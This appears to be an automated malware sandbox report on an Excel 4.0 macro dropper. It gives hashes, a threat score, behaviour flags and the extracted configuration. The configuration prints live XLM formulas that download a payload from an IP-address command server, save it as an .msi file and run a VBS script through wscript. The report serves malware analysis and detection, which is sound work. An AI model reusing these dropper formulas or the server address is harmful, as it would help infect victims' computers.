General

  • Target

    5096fae40bc6b58c09e0c7d419df54e4

  • Size

    6KB

  • Sample

    231222-cnqwasfedq

  • MD5

    5096fae40bc6b58c09e0c7d419df54e4

  • SHA1

    5f03b300397160d18a2365ccf85e05c098e42abe

  • SHA256

    f80c5aa7fb0aaf4dc8e8dc11e59e04dfe2e5e81b127fdc4958d4724c769c6bbb

  • SHA512

    513cb7afeedb28f9b6f432f433a9aa68f50d2719d1bca9bc7bdba1603cc1f296f47bc3ae1475e3a610ebbaad87978ea999fa049adcddfc44ea266bb7de52cb4c

  • SSDEEP

    192:NDSluSDbrA2OmmfRu8UhHFBFYuob98yxrlr4orrJIrTrWr7+yrrOrurVrrprwri:NuuoM2wY1FYpb98yxrlr4orrJIrTrWr9

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      5096fae40bc6b58c09e0c7d419df54e4

    • Size

      6KB

    • MD5

      5096fae40bc6b58c09e0c7d419df54e4

    • SHA1

      5f03b300397160d18a2365ccf85e05c098e42abe

    • SHA256

      f80c5aa7fb0aaf4dc8e8dc11e59e04dfe2e5e81b127fdc4958d4724c769c6bbb

    • SHA512

      513cb7afeedb28f9b6f432f433a9aa68f50d2719d1bca9bc7bdba1603cc1f296f47bc3ae1475e3a610ebbaad87978ea999fa049adcddfc44ea266bb7de52cb4c

    • SSDEEP

      192:NDSluSDbrA2OmmfRu8UhHFBFYuob98yxrlr4orrJIrTrWr7+yrrOrurVrrprwri:NuuoM2wY1FYpb98yxrlr4orrJIrTrWr9

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks